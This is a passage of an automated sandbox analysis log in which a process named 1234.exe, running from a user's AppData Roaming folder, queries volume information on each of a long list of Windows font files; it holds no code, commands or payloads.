Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\1234.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
